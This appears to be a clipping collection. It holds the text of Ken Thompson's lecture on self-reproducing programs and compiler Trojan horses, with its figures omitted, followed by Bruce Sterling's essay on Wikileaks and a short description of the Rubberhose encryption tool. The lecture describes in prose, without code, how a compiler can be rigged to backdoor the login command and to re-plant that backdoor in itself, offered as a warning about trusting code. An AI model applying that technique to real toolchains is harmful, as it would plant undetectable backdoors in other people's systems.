I thank the ACM for this award. I can’t help but feel that I am receiving this honor for timing and serendipity as much as technical merit. UNIX swept into popularity with an industry-wide change from central main frames to autonomous minis. I suspect that Daniel Bobrow (1) would be here instead of me if he could not afford a PDP-10 and and had to “settle” for a PDP-11. Moreover, the current state of UNIX is the result of the labors of a large number of people.

There is an old adage, “Dance with the one that brought you,” which means that I should talk about UNIX. I have not worked on mainstream UNIX in many years, yet I continue to get undeserved credit for the work of others. Therefore, I am not going to talk about UNIX, but I want to thank everyone who has contributed.

That brings me to Dennis Ritchie. Our collaboration has been a thing of beauty. In the ten years that we have worked together, I can recall only one case of miscoordination of work. On that occasion, I discovered that we both had written the same 20-line assembly language program. I compared the sources and was astounded to find that they matched character-for-character. The result of our work together has been far greater than the work that we each contributed.

I am a programmer. On my 1040 form, that is what I put down as my occupation. As a programmer, I write programs. I would like to present to you the cutest program I ever wrote. I will do this in three stages and try to bring it together at the end.

Stage I

In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular.

More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about “shortest” was just an incentive to demonstrate skill and determine a winner.

FIGURE 1

Figure I shows a self-reproducing program in the C programming language. (The purist will note that the program is not precisely a self-reproducing program, but will produce a self-reproducing program.) This entry is much too large to win a prize, but it demonstrates the technique and has two important properties that I need to complete my story: (1) This program can be easily written by another program. (2) This program can contain an arbitrary amount of excess baggage that will be reproduced along with the main algorithm. In the example, even the comment is reproduced.

Stage II

The C compiler is written in C. What I am about to describe is one of many “chicken and egg” problems that arise when compilers are written in their own language. In this ease, I will use a specific example from the C compiler.

C allows a string construct to specify an initialized character array. The individual characters in the string can be escaped to represent unprintable characters. For example,

“Hello world\n”
represents a string with the character “\n,” representing the new line character.

FIGURE 3

Suppose we wish to alter the C compiler to include the sequence “\v” to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about “\v,” the source is not legal C. We must “train” the compiler. After it “knows” what “\v” means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3.

FIGURE 4

This is a deep concept. It is as close to a “learning” program as I have seen. You simply tell it once, then you can use this self-referencing definition.

Stage III

FIGURE 5
Again, in the C compiler, Figure 5 represents the high-level control of the C compiler where the routine “compile” is called to compile the next line of source. Figure 6 shows a simple modification to the compiler that will deliberately miscompile source whenever a particular pattern is matched. If this were not deliberate, it would be called a compiler “bug.” Since it is deliberate, it should be called a “Trojan horse.”

FIGURE 6

The actual bug I planted in the compiler would match code in the UNIX “login” command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions.

FIGURE 7

The final step is represented in Figure 7. This simply adds a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere.

Moral

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

After trying to convince you that I cannot be trusted, I wish to moralize. I would like to criticize the press in its handling of the “hackers,” the 414 gang, the Dalton gang, etc. The acts performed by these kids are vandalism at best and probably trespass and theft at worst. It is only the inadequacy of the criminal code that saves the hackers from very serious prosecution. The companies that are vulnerable to this activity (and most large companies are very vulnerable) are pressing hard to update the criminal code. Unauthorized access to computer systems is already a serious crime in a few states and is currently being addressed in many more state legislatures as well as Congress.

There is an explosive situation brewing. On the one hand, the press, television, and movies make heroes of vandals by calling them whiz kids. On the other hand, the acts performed by these kids will soon be punishable by years in prison.

I have watched kids testifying before Congress. It is clear that they are completely unaware of the seriousness of their acts. There is obviously a cultural gap. The act of breaking into a computer system has to have the same social stigma as breaking into a neighbor’s house. It should not matter that the neighbor’s door is unlocked. The press must learn that misguided use of a computer is no more amazing than drunk driving of an automobile.

Acknowledgment

I first read of the possibility of such a Trojan horse in an Air Force critique (4) of the security of an early implementation of Multics.

References

• Bobrow, D.G., Burchfiel, J.D., Murphy, D.L., and Tomlinson, R.S. TENEX, a paged time-sharing system for the PDP-10. Commun. ACM 15, 3 (Mar. 1972), 135-143.
• Kernighan, B.W., and Ritchie, D.M. The C Programming Language. Prentice-Hall, Englewood Cliffs, N.J., 1978.
• Ritchie, D.M., and Thompson, K. The UNIX time-sharing system. Commun. ACM 17, 7(July 1974), 365-375.
• Karger, P.A., and Schell, R.R. Multics Security Evaluation: Vulnerability Analysis. ESD-TR-74-193, Vol II, June 1974, p 52.

TRANSPARENCY (vs DISCRETION)
http://martin.hinner.info/crackdown/english/index.html
http://www.webstock.org.nz/blog/2010/the-blast-shack/
The Blast Shack
by Bruce Sterling / 22 December 2010

{{ Webstock asked Bruce Sterling, who spoke at Webstock ’09, for his take on Wikileaks. }}

The Wikileaks Cablegate scandal is the most exciting and interesting hacker scandal ever. I rather commonly write about such things, and I’m surrounded by online acquaintances who take a burning interest in every little jot and tittle of this ongoing saga. So it’s going to take me a while to explain why this highly newsworthy event fills me with such a chilly, deadening sense of Edgar Allen Poe melancholia. But it sure does. Part of this dull, icy feeling, I think, must be the agonizing slowness with which this has happened. At last — at long last — the homemade nitroglycerin in the old cypherpunks blast shack has gone off.

Those “cypherpunks,” of all people. Way back in 1992, a brainy American hacker called Timothy C. May made up a sci-fi tinged idea that he called “The Crypto Anarchist Manifesto.” This exciting screed — I read it at the time, and boy was it ever cool — was all about anonymity, and encryption, and the Internet, and all about how wacky data-obsessed subversives could get up to all kinds of globalized mischief without any fear of repercussion from the blinkered authorities. If you were of a certain technoculture bent in the early 1990s, you had to love a thing like that. As Tim blithely remarked to his fellow encryption enthusiasts, “The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be traded freely,” and then Tim started getting really interesting.

Later, May described an institution called “BlackNet” which might conceivably carry out these aims. Nothing much ever happened with Tim May’s imaginary BlackNet. It was the kind of out-there concept that science fiction writers like to put in novels. Because BlackNet was clever, and fun to think about, and it made impossible things seem plausible, and it was fantastic and also quite titillating. So it was the kind of farfetched but provocative issue that ought to be properly raised within a sci-fi public discourse.

Because, you know, that would allow plenty of time to contemplate the approaching trainwreck and perhaps do something practical about it. Nobody did much of anything practical. For nigh on twenty long years, nothing happened with the BlackNet notion, for good or ill. Why? Because thinking hard and eagerly about encryption involves a certain mental composition which is alien to normal public life. Crypto guys — (and the cypherpunks were all crypto guys, mostly well-educated, mathematically gifted middle-aged guys in Silicon Valley careers) — are geeks. They’re harmless geeks, they’re not radical politicians or dashing international crime figures. Cypherpunks were visionary Californians from the WIRED magazine circle. In their personal lives, they were as meek and low-key as any average code-cracking spook who works for the National Security Agency. These American spooks from Fort Meade are shy and retiring people, by their nature. In theory, the NSA could create every kind of flaming scandalous mayhem with their giant Echelon spy system — but in practice, they would much would rather sit there gently reading other people’s email.


NSA, via Google Earth, 10 March 2008

One minute’s thought would reveal that a vast, opaque electronic spy outfit like the National Security Agency is exceedingly dangerous to democracy. Really, it is. The NSA clearly violates all kinds of elementary principles of constitutional design. The NSA is the very antithesis of transparency, and accountability, and free elections, and free expression, and separation of powers — in other words, the NSA is a kind of giant, grown-up, anti-Wikileaks. And it always has been. And we’re used to that. We pay no mind. The NSA, this crypto empire, is a long-lasting fact on the ground that we’ve all informally agreed not to get too concerned about. Even foreign victims of the NSA’s machinations can’t seem to get properly worked-up about its capacities and intrigues. The NSA has been around since 1947. It’s a little younger than the A-Bomb, and we don’t fuss much about that now, either. The geeks who man the NSA don’t look much like Julian Assange, because they have college degrees, shorter haircuts, better health insurance and far fewer stamps in their passports. But the sources of their power are pretty much identical to his. They use computers and they get their mitts on info that doesn’t much wanna be free. Every rare once in a while, the secretive and discreet NSA surfaces in public life and does something reprehensible, such as defeating American federal computer-security initiatives so that they can continue to eavesdrop at will. But the NSA never becomes any big flaming Wikileaks scandal. Why? Because, unlike their wannabe colleagues at Wikileaks, the apparatchiks of the NSA are not in the scandal business. They just placidly sit at the console, reading everybody’s diplomatic cables. This is their function. The NSA is an eavesdropping outfit.

Cracking the communications of other governments is its reason for being. The NSA are not unique entities in the shadows of our planet’s political landscape. Every organized government gives that a try. It’s a geopolitical fact, although it’s not too discreet to dwell on it. You can walk to most any major embassy in any major city in the world, and you can see that it is festooned with wiry heaps of electronic spying equipment. Don’t take any pictures of the roofs of embassies, as they grace our public skylines. Guards will emerge to repress you.

Now, Tim May and his imaginary BlackNet were the sci-fi extrapolation version of the NSA. A sort of inside-out, hippiefied NSA. Crypto people were always keenly aware of the NSA, for the NSA were the people who harassed them for munitions violations and struggled to suppress their academic publications. Creating a BlackNet is like having a pet, desktop NSA. Except, that instead of being a vast, federally-supported nest of supercomputers under a hill in Maryland, it’s a creaky, homemade, zero-budget social-network site for disaffected geeks.

But who cared about that wild notion? Why would that amateurish effort ever matter to real-life people? It’s like comparing a mighty IBM mainframe to some cranky Apple computer made inside a California garage. Yes, it’s almost that hard to imagine. So Wikileaks is a manifestation of something that this has been growing all around us, for decades, with volcanic inexorability. The NSA is the world’s most public unknown secret agency. And for four years now, its twisted sister Wikileaks has been the world’s most blatant, most publicly praised, encrypted underground site. Wikileaks is “underground” in the way that the NSA is “covert”; not because it’s inherently obscure, but because it’s discreetly not spoken about. The NSA is “discreet,” so, somehow, people tolerate it. Wikileaks is “transparent,” like a cardboard blast shack full of kitchen-sink nitroglycerine in a vacant lot.

That is how we come to the dismal saga of Wikileaks and its ongoing Cablegate affair, which is a melancholy business, all in all. The scale of it is so big that every weirdo involved immediately becomes a larger-than-life figure. But they’re not innately heroic. They’re just living, mortal human beings, the kind of geeky, quirky, cyberculture loons that I run into every day. And man, are they ever going to pay. Now we must contemplate Bradley Manning, because he was the first to immolate himself. Private Manning was a young American, a hacker-in-uniform, bored silly while doing scarcely necessary scutwork on a military computer system in Iraq. Private Manning had dozens of reasons for becoming what computer-security professionals call the “internal threat.” His war made no sense on its face, because it was carried out in a headlong pursuit of imaginary engines of mass destruction.

The military occupation of Iraq was endless. Manning, a tender-hearted geek, was overlooked and put-upon by his superiors. Although he worked around the clock, he had nothing of any particular military consequence to do. It did not occur to his superiors that a bored soldier in a poorly secured computer system would download hundreds of thousands of diplomatic cables. Because, well, why? They’re very boring. Soldiers never read them. The malefactor has no use for them. They’re not particularly secret. They’ve got nothing much to do with his war. He knows his way around the machinery, but Bradley Manning is not any kind of blackhat programming genius. Instead, he’s very like Jerome Kerveil, that obscure French stock trader who stole 5 billion euros without making one dime for himself.


Jerome Kerveil, just like Bradley Manning, was a bored, resentful, lower-echelon guy in a dead end, who discovered some awesome capacities in his system that his bosses never knew it had. It makes so little sense to behave like Kerveil and Manning that their threat can’t be imagined. A weird hack like that is self-defeating, and it’s sure to bring terrible repercussions to the transgressor. But then the sad and sordid days grind on and on; and that blindly potent machinery is just sitting there. Sitting there, tempting the user. Bradley Manning believes the sci-fi legendry of the underground. He thinks that he can leak a quarter of a million secret cables, protect himself with neat-o cryptography, and, magically, never be found out.

So Manning does this, and at first he gets away with it, but, still possessed by the malaise that haunts his soul, he has to brag about his misdeed, and confess himself to a hacker confidante who immediately ships him to the authorities. No hacker story is more common than this. The ingenuity poured into the machinery is meaningless. The personal connections are treacherous. Welcome to the real world. So Private Manning, cypherpunk, is immediately toast. No army can permit this kind of behavior and remain a functional army; so Manning is in solitary confinement and he is going to be court-martialled. With more political awareness, he might have made himself a public martyr to his conscience; but he lacks political awareness. He only has only his black-hat hacker awareness, which is all about committing awesome voyeuristic acts of computer intrusion and imagining you can get away with that when it really matters to people. The guy preferred his hacker identity to his sworn fidelity to the uniform of a superpower.

The shear-forces there are beyond his comprehension. The reason this upsets me is that I know so many people just like Bradley Manning. Because I used to meet and write about hackers, “crackers,” “darkside hackers,” “computer underground” types. They are a subculture, but once you get used to their many eccentricities, there is nothing particularly remote or mysterious or romantic about them. They are banal. Bradley Manning is a young, mildly brainy, unworldly American guy who probably would have been pretty much okay if he’d been left alone to skateboard, read comic books and listen to techno music. Instead, Bradley had to leak all over the third rail. Through historical circumstance, he’s become a miserable symbolic point-man for a global war on terror. He doesn’t much deserve that role. He’s got about as much to do with the political aspects of his war as Monica Lewinsky did with the lasting sexual mania that afflicts the American Republic. That is so dispiriting and ugly. As a novelist, I never think of Monica Lewinsky, that once-everyday young woman, without a sense of dread at the freakish, occult fate that overtook her. Imagine what it must be like, to wake up being her, to face the inevitability of being That Woman. Monica, too, transgressed in apparent safety and then she had the utter foolishness to brag to a lethal enemy, a trusted confidante who ran a tape machine and who brought her a mediated circus of hells. The titillation of that massive, shattering scandal has faded now. But think of the quotidian daily horror of being Monica Lewinsky, and that should take a bite from the soul. Bradley Manning now shares that exciting, oh my God, Monica Lewinsky, tortured media-freak condition. This mild little nobody has become super-famous, and in his lonely military brig, screenless and without a computer, he’s strictly confined and, no doubt, he’s horribly bored.

I don’t want to condone or condemn the acts of Bradley Manning. Because legions of people are gonna do that for me, until we’re all good and sick of it, and then some. I don’t have the heart to make this transgressor into some hockey-puck for an ideological struggle. I sit here and I gloomily contemplate his all-too-modern situation with a sense of Sartrean nausea. Commonly, the authorities don’t much like to crush apple-cheeked white-guy hackers like Bradley Manning. It’s hard to charge hackers with crimes, even when they gleefully commit them, because it’s hard to find prosecutors and judges willing to bone up on the drudgery of understanding what they did. But they’ve pretty much got to make a puree’ out of this guy, because of massive pressure from the gravely embarrassed authorities. Even though Bradley lacks the look and feel of any conventional criminal; wrong race, wrong zipcode, wrong set of motives. Bradley’s gonna become a “spy” whose “espionage” consisted of making the activities of a democratic government visible to its voting population. With the New York Times publishing the fruits of his misdeeds. Some set of American prosecutorial lawyers is confronting this crooked legal hairpin right now. I feel sorry for them.

Then there is Julian Assange, who is a pure-dye underground computer hacker. Julian doesn’t break into systems at the moment, but he’s not an “ex-hacker,” he’s the silver-plated real deal, the true avant-garde. Julian is a child of the underground hacker milieu, the digital-native as twenty-first century cypherpunk. As far as I can figure, Julian has never found any other line of work that bore any interest for him. Through dint of years of cunning effort, Assange has worked himself into a position where his “computer crimes” are mainly political. They’re probably not even crimes. They are “leaks.” Leaks are nothing special. They are tidbits from the powerful that every journalist gets on occasion, like crumbs of fishfood on the top of the media tank. Only, this time, thanks to Manning, Assange has brought in a massive truckload of media fishfood. It’s not just some titillating, scandalous, floating crumbs. There’s a quarter of a million of them. He’s become the one-man global McDonald’s of leaks. Ever the detail-freak, Assange in fact hasn’t shipped all the cables he received from Manning. Instead, he cunningly encrypted the cables and distributed them worldwide to thousands of fellow-travellers. This stunt sounds technically impressive, although it isn’t. It’s pretty easy to do, and nobody but a cypherpunk would think that it made any big difference to anybody. It’s part and parcel of Assange’s other characteristic activities, such as his inability to pack books inside a box while leaving any empty space. While others stare in awe at Assange’s many otherworldly aspects — his hairstyle, his neatness, too-precise speech, his post-national life out of a laptop bag — I can recognize him as pure triple-A outsider geek. Man, I know a thousand modern weirdos like that, and every single one of them seems to be on my Twitter stream screaming support for Assange because they can recognize him as a brother and a class ally. They are in holy awe of him because, for the first time, their mostly-imaginary and lastingly resentful underclass has landed a serious blow in a public arena. Julian Assange has hacked a superpower.

He didn’t just insult the captain of the global football team; he put spycams in the locker room. He has showed the striped-pants set without their pants. This a massively embarrassing act of technical voyeurism. It’s like Monica and her stains and kneepads, only even more so. Now, I wish I could say that I feel some human pity for Julian Assange, in the way I do for the hapless, one-shot Bradley Manning, but I can’t possibly say that. Pity is not the right response, because Assange has carefully built this role for himself. He did it with all the minute concentration of some geek assembling a Rubik’s Cube. In that regard, one’s hat should be off to him. He’s had forty years to learn what he was doing. He’s not some miserabilist semi-captive like the uniformed Bradley Manning. He’s a darkside player out to stick it to the Man. The guy has surrounded himself with the cream of the computer underground, wily old rascals like Rop Gonggrijp and the fearsome Teutonic minions of the Chaos Computer Club. Assange has had many long, and no doubt insanely detailed, policy discussions with all his closest allies, about every aspect of his means, motives and opportunities. And he did what he did with fierce resolve. Furthermore, and not as any accident, Assange has managed to alienate everyone who knew him best. All his friends think he’s nuts. I’m not too thrilled to see that happen. That’s not a great sign in a consciousness-raising, power-to-the-people, radical political-leader type. Most successful dissidents have serious people skills and are way into revolutionary camaraderie and a charismatic sense of righteousness. They’re into kissing babies, waving bloody shirts, and keeping hope alive. Not this chilly, eldritch guy. He’s a bright, good-looking man who — let’s face it — can’t get next to women without provoking clumsy havoc and a bitter and lasting resentment. That’s half the human race that’s beyond his comprehension there, and I rather surmise that, from his stern point of view, it was sure to be all their fault. Assange was in prison for a while lately, and his best friend in the prison was his Mom. That seems rather typical of him. Obviously Julian knew he was going to prison; a child would know it. He’s been putting on his Solzhenitsyn clothes and combing his forelock for that role for ages now. I’m a little surprised that he didn’t have a more organized prison-support committee, because he’s a convicted computer criminal who’s been through this wringer before. Maybe he figures he’ll reap more glory if he’s martyred all alone.

I rather doubt the authorities are any happier to have him in prison. They pretty much gotta feed him into their legal wringer somehow, but a botched Assange show-trial could do colossal damage. There’s every likelihood that the guy could get off. He could walk into an American court and come out smelling of roses. It’s the kind of show-trial judo every repressive government fears. It’s not just about him and the burning urge to punish him; it’s about the public risks to the reputation of the USA. They superpower hypocrisy here is gonna be hard to bear. The USA loves to read other people’s diplomatic cables. They dote on doing it. If Assange had happened to out the cable-library of some outlaw pariah state, say, Paraguay or North Korea, the US State Department would be heaping lilies at his feet. They’d be a little upset about his violation of the strict proprieties, but they’d also take keen satisfaction in the hilarious comeuppance of minor powers that shouldn’t be messing with computers, unlike the grandiose, high-tech USA. Unfortunately for the US State Department, they clearly shouldn’t have been messing with computers, either. In setting up their SIPRnet, they were trying to grab the advantages of rapid, silo-free, networked communication while preserving the hierarchical proprieties of official confidentiality. That’s the real issue, that’s the big modern problem; national governments and global computer networks don’t mix any more. It’s like trying to eat a very private birthday cake while also distributing it. That scheme is just not working. And that failure has a face now, and that’s Julian Assange. Assange didn’t liberate the dreadful secrets of North Korea, not because the North Koreans lack computers, but because that isn’t a cheap and easy thing that half-a-dozen zealots can do. But the principle of it, the logic of doing it, is the same. Everybody wants everybody else’s national government to leak. Every state wants to see the diplomatic cables of every other state. It will bend heaven and earth to get them. It’s just, that sacred activity is not supposed to be privatized, or, worse yet, made into the no-profit, shareable, have-at-it fodder for a network society, as if global diplomacy were so many mp3s. Now the US State Department has walked down the thorny road to hell that was first paved by the music industry. Rock and roll, baby. Now, in strict point of fact, Assange didn’t blandly pirate the massive hoard of cables from the US State Department. Instead, he was busily “redacting” and minutely obeying the proprieties of his political cover in the major surviving paper dailies. Kind of a nifty feat of social-engineering there; but he’s like a poacher who machine-gunned a herd of wise old elephants and then went to the temple to assume the robes of a kosher butcher. That is a world-class hoax. Assange is no more a “journalist” than he is a crypto mathematician. He’s a darkside hacker who is a self-appointed, self-anointed, self-educated global dissident. He’s a one-man Polish Solidarity, waiting for the population to accrete around his stirring propaganda of the deed. And they are accreting; not all of ‘em, but, well, it doesn’t take all of them.

Julian Assange doesn’t want to be in power; he has no people skills at all, and nobody’s ever gonna make him President Vaclav Havel. He’s certainly not in for the money, because he wouldn’t know what to do with the cash; he lives out of a backpack, and his daily routine is probably sixteen hours online. He’s not gonna get better Google searches by spending more on his banned MasterCard. I don’t even think Assange is all that big on ego; I know authors and architects, so I’ve seen much worse than Julian in that regard. He’s just what he is; he’s something we don’t yet have words for. He’s a different, modern type of serious troublemaker. He’s certainly not a “terrorist,” because nobody is scared and no one got injured. He’s not a “spy,” because nobody spies by revealing the doings of a government to its own civil population. He is orthogonal. He’s asymmetrical. He panics people in power and he makes them look stupid. And I feel sorry for them. But sorrier for the rest of us. Julian Assange’s extremely weird version of dissident “living in truth” doesn’t bear much relationship to the way that public life has ever been arranged. It does, however, align very closely to what we’ve done to ourselves by inventing and spreading the Internet. If the Internet was walking around in public, it would look and act a lot like Julian Assange. The Internet is about his age, and it doesn’t have any more care for the delicacies of profit, propriety and hierarchy than he does. So Julian is heading for a modern legal netherworld, the slammer, the electronic parole cuff, whatever; you can bet there will be surveillance of some kind wherever he goes, to go along with the FREE ASSANGE stencils and xeroxed flyers that are gonna spring up in every coffee-bar, favela and university on the planet. A guy as personally hampered and sociopathic as Julian may in fact thrive in an inhuman situation like this. Unlike a lot of keyboard-hammering geeks, he’s a serious reader and a pretty good writer, with a jailhouse-lawyer facility for pointing out weaknesses in the logic of his opponents, and boy are they ever. Weak, that is. They are pathetically weak.

Diplomats have become weak in the way that musicians are weak. Musicians naturally want people to pay real money for music, but if you press them on it, they’ll sadly admit that they don’t buy any music themselves. Because, well, they’re in the business, so why should they? And the same goes for diplomats and discreet secrets. The one grand certainty about the consumers of Cablegate is that diplomats are gonna be reading those stolen cables. Not hackers: diplomats. Hackers bore easily, and they won’t be able to stand the discourse of intelligent trained professionals discussing real-life foreign affairs. American diplomats are gonna read those stolen cables, though, because they were supposed to read them anyway, even though they didn’t. Now, they’ve got to read them, with great care, because they might get blindsided otherwise by some wisecrack that they typed up years ago. And, of course, every intelligence agency and every diplomat from every non-American agency on Earth is gonna fire up computers and pore over those things. To see what American diplomacy really thought about them, or to see if they were ignored (which is worse), and to see how the grownups ran what was basically a foreign-service news agency that the rest of us were always forbidden to see. This stark fact makes them all into hackers. Yes, just like Julian. They’re all indebted to Julian for this grim thing that he did, and as they sit there hunched over their keyboards, drooling over their stolen goodies, they’re all, without exception, implicated in his doings. Assange is never gonna become a diplomat, but he’s arranged it so that diplomats henceforth are gonna be a whole lot more like Assange. They’ll behave just like him. They receive the goods just like he did, semi-surreptitiously. They may be wearing an ascot and striped pants, but they’ve got that hacker hunch in their necks and they’re staring into the glowing screen. And I don’t much like that situation. It doesn’t make me feel better. I feel sorry for them and what it does to their values, to their self-esteem. If there’s one single watchword, one central virtue, of the diplomatic life, it’s “discretion.” Not “transparency.” Diplomatic discretion. Discretion is why diplomats do not say transparent things to foreigners. When diplomats tell foreigners what they really think, war results. Diplomats are people who speak from nation to nation. They personify nations, and nations are brutal, savage, feral entities. Diplomats used to have something in the way of an international community, until the Americans decided to unilaterally abandon that in pursuit of Bradley Manning’s oil war. Now nations are so badly off that they can’t even get it together to coherently tackle heroin, hydrogen bombs, global warming and financial collapse. Not to mention the Internet. The world has lousy diplomacy now. It’s dysfunctional. The world corps diplomatique are weak, really weak, and the US diplomatic corps, which used to be the senior and best-engineered outfit there, is rattling around bottled-up in blast-proofed bunkers. It’s scary how weak and useless they are. US diplomats used to know what to do with dissidents in other nations. If they were communists they got briskly repressed, but if they had anything like a free-market outlook, then US diplomats had a whole arsenal of gentle and supportive measures; Radio Free Europe, publication in the West, awards, foreign travel, flattery, moral support; discreet things, in a word, but exceedingly useful things. Now they’re harassing Julian by turning those tools backwards. For a US diplomat, Assange is like some digitized nightmare-reversal of a kindly Cold War analog dissident. He read the dissident playbook and he downloaded it as a textfile; but, in fact, Julian doesn’t care about the USA. It’s just another obnoxious national entity. He happens to be more or less Australian, and he’s no great enemy of America. If he’d had the chance to leak Australian cables he would have leapt on that with the alacrity he did on Kenya. Of course, when Assange did it that to meager little Kenya, all the grown-ups thought that was groovy; he had to hack a superpower in order to touch the third rail. But the American diplomatic corps, and all it thinks it represents, is just collateral damage between Assange and his goal. He aspires to his transparent crypto-utopia in the way George Bush aspired to imaginary weapons of mass destruction. And the American diplomatic corps are so many Iraqis in that crusade. They’re the civilian casualties.

As a novelist, you gotta like the deep and dark irony here. As somebody attempting to live on a troubled world… I dunno. It makes one want to call up the Red Cross and volunteer to fund planetary tranquilizers. I’ve met some American diplomats; not as many as I’ve met hackers, but a few. Like hackers, diplomats are very intelligent people; unlike hackers, they are not naturally sociopathic. Instead, they have to be trained that way in the national interest. I feel sorry for their plight. I can enter into the shame and bitterness that afflicts them now. The cables that Assange leaked have, to date, generally revealed rather eloquent, linguistically gifted American functionaries with a keen sensitivity to the feelings of aliens. So it’s no wonder they were of dwindling relevance and their political masters paid no attention to their counsels. You don’t have to be a citizen of this wracked and threadbare superpower — (you might, for instance, be from New Zealand) — in order to sense the pervasive melancholy of an empire in decline. There’s a House of Usher feeling there. Too many prematurely buried bodies. For diplomats, a massive computer leak is not the kind of sunlight that chases away corrupt misbehavior; it’s more like some dreadful shift in the planetary atmosphere that causes ultraviolet light to peel their skin away. They’re not gonna die from being sunburned in public without their pants on; Bill Clinton survived that ordeal, Silvio Berlusconi just survived it (again). No scandal lasts forever; people do get bored. Generally, you can just brazen it out and wait for public to find a fresher outrage. Except. It’s the damage to the institutions that is spooky and disheartening; after the Lewinsky eruption, every American politician lives in permanent terror of a sex-outing. That’s “transparency,” too; it’s the kind of ghastly sex-transparency that Julian himself is stuck crotch-deep in. The politics of personal destruction hasn’t made the Americans into a frank and erotically cheerful people. On the contrary, the US today is like some creepy house of incest divided against itself in a civil cold war.

“Transparency” can have nasty aspects; obvious, yet denied; spoken, but spoken in whispers. Very Edgar Allen Poe. That’s our condition. It’s a comedy to those who think and a tragedy to those who feel, but it’s not a comedy that the planet’s general cultural situation is so clearly getting worse. As I sit here moping over Julian Assange, I’d love to pretend that this is just me in a personal bad mood; in the way that befuddled American pundits like to pretend that Julian is some kind of unique, demonic figure. He isn’t. If he ever was, he sure as hell isn’t now, as “Indoleaks,” “Balkanleaks” and “Brusselsleaks” spring up like so many filesharing whackamoles. Of course the Internet bedroom legions see him, admire him, and aspire to be like him — and they will. How could they not? Even though, as major political players go, Julian Assange seems remarkably deprived of sympathetic qualities. Most saintly leaders of the oppressed masses, most wannabe martyrs, are all keen to kiss-up to the public. But not our Julian; clearly, he doesn’t lack for lust and burning resentment, but that kind of gregarious, sweaty political tactility is beneath his dignity. He’s extremely intelligent, but, as a political, social and moral actor, he’s the kind of guy who gets depressed by the happiness of the stupid. I don’t say these cruel things about Julian Assange because I feel distant from him, but, on the contrary, because I feel close to him. I don’t doubt the two of us would have a lot to talk about. I know hordes of men like him; it’s just that they are programmers, mathematicians, potheads and science fiction fans instead of fiercely committed guys who aspire to topple the international order and replace it with subversive wikipedians.


Enigma machines were used by the Nazis in WWII (unsuccessfully) to ensure world domination.

The chances of that ending well are about ten thousand to one. And I don’t doubt Assange knows that. This is the kind of guy who once wrote an encryption program called “Rubberhose,” because he had it figured that the cops would beat his password out of him, and he needed some code-based way to finesse his own human frailty. Hey, neat hack there, pal. So, well, that’s the general situation with this particular scandal. I could go on about it, but I’m trying to pace myself. This knotty situation is not gonna “blow over,” because it’s been building since 1993 and maybe even 1947. “Transparency” and “discretion” are virtues, but they are virtues that clash. The international order and the global Internet are not best pals. They never were, and now that’s obvious. The data held by states is gonna get easier to steal, not harder to steal; the Chinese are all over Indian computers, the Indians are all over Pakistani computers, and the Russian cybermafia is brazenly hosting wikileaks.info because that’s where the underground goes to the mattresses. It is a godawful mess. This is gonna get worse before it gets better, and it’s gonna get worse for a long time. Like leaks in a house where the pipes froze. Well, every once in a while, a situation that’s one-in-a-thousand is met by a guy who is one in a million. It may be that Assange is, somehow, up to this situation. Maybe he’s gonna grow in stature by the massive trouble he has caused. Saints, martyrs, dissidents and freaks are always wild-cards, but sometimes they’re the only ones who can clear the general air. Sometimes they become the catalyst for historical events that somehow had to happen. They don’t have to be nice guys; that’s not the point. Julian Assange did this; he direly wanted it to happen. He planned it in nitpicky, obsessive detail. Here it is; a planetary hack. I don’t have a lot of cheery hope to offer about his all-too-compelling gesture, but I dare to hope he’s everything he thinks he is, and much, much, more.

CONTACT
Bruce Sterling
http://www.wired.com/beyond_the_beyond/
email : bruces [at] well [dot] com

RUBBER HOSE CRYPTO
http://en.wikipedia.org/wiki/Rubber_hose_cryptanalysis
http://iq.org/~proff/rubberhose.org/current/src/doc/sergienko.html
http://iq.org/~proff/rubberhose.org/current/src/SECURITY
http://iq.org/~proff/rubberhose.org/current/src/doc/beatings.txt
by Julian Assange

Rubberhose was originally conceived by crypto-programmer Julian Assange as a tool for human rights workers who needed to protect sensitive data in the field, particularly lists of activists and details of incidents of abuse. Repressive regimes in places like East Timor, Russia, Kosovo, Guatamalia, Iraq, Sudan and The Congo conduct human rights abuses regularly. Our team has met with human rights groups an heard first hand accounts of such abuses. Human rights workers carry vital data on laptops through the most dangerous situations, sometimes being stopped by military patrols who would have no hesitation in torturing a suspect until he or she revealed a passphrase to unlock the data. We want to help these sorts of campaigners, particularly the brave people in the field who risk so much to smuggle data about the abuses out to the rest of the world.

